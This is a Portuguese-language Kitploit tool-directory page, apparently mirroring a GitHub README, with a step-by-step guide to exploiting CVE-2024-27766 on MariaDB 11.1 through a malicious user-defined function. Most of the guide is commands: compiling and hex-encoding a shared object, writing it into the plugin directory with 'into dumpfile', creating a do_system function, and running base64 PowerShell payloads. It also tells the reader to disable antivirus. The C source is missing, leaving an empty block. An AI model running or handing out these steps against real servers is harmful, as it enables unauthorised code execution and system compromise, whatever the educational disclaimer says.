Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Mysql_CVE-2024-27766 — Execução de código autenticada em banco de dados | Kitploit
Ferramentas/GitHubGitHub/hissec/mysql_cve-2024-27766
Análise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de PayloadsSegurança de Banco de Dados
GitHubhissec/mysql_cve-2024-27766

Mysql_CVE-2024-27766

Execução de código autenticada em banco de dados

Ver Repositório
13há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Guia de Reprodução de Exploit (versão afetada do produto MariaDB 11.1)

Este guia fornece instruções passo a passo para reproduzir um ataque de Função Definida pelo Usuário (UDF) em um sistema de banco de dados. Observe que este exploit pode funcionar em alguns sistemas, mas pode não funcionar corretamente em arquiteturas de 64 bits ou em determinadas compilações.

Aviso: Este conteúdo é apenas para fins educacionais. O uso não autorizado dessas técnicas é ilegal e antiético.

Passos para Reproduzir o Ataque

1. Baixar e preparar o código da UDF

Primeiro, crie um arquivo chamado exploit.c e adicione o seguinte código:

root@kitploit:~

### 2. Compilar o código da UDF

Compile o código do exploit usando o compilador `x86_64-w64-mingw32-gcc`:

```bash
x86_64-w64-mingw32-gcc -g -c exploit.c

3. Criar um arquivo de objeto compartilhado

Gere um arquivo de objeto compartilhado (exploit.so) a partir do arquivo de objeto compilado:

root@kitploit:~
x86_64-w64-mingw32-gcc -g -shared -Wl,-soname,exploit.so -o exploit.so exploit.o

4. Converter o arquivo de objeto compartilhado em hexadecimal

Use o xxd para converter o arquivo .so em um formato hexadecimal:

root@kitploit:~
xxd -p exploit.so | tr -d '\n' > hex_value.txt

5. Carregar o valor hexadecimal no banco de dados

Copie o valor hexadecimal de hex_value.txt e execute o seguinte comando em seu banco de dados:

root@kitploit:~
DB> set @shell = 0x<hex_value>;

6. Determinar o diretório de plugins e implantar o exploit

Encontre o diretório de plugins executando:

root@kitploit:~
DB> select @@plugin_dir;

Em seguida, crie o objeto compartilhado do exploit no diretório de plugins:

root@kitploit:~
DB> select binary @shell into dumpfile 'C:\\Program Files\\MariaDB 11.1\\lib\\plugin\\exploit.so';

Nota: Ajuste o caminho de acordo com a configuração do seu sistema ou com o diretório de plugins específico.

7. Criar a função maliciosa

Crie uma nova função no banco de dados usando o exploit:

root@kitploit:~
DB> create function do_system returns integer soname 'exploit.so';

8. Executar o exploit

Desative qualquer antivírus ou o Windows Defender que possa bloquear o exploit. Em seguida, execute um comando usando a função recém-criada:

root@kitploit:~
DB> select do_system('powershell base64 here');

Substitua 'powershell base64 here' pelo payload codificado em base64 do comando que você deseja executar.


Aviso legal: Este documento destina-se apenas a fins educacionais e de pesquisa em segurança. O uso indevido dessas informações pode resultar em acusações criminais e penalidades legais severas. Sempre obtenha permissão das autoridades competentes antes de testar qualquer vulnerabilidade em uma rede ou sistema.

Baixar ferramenta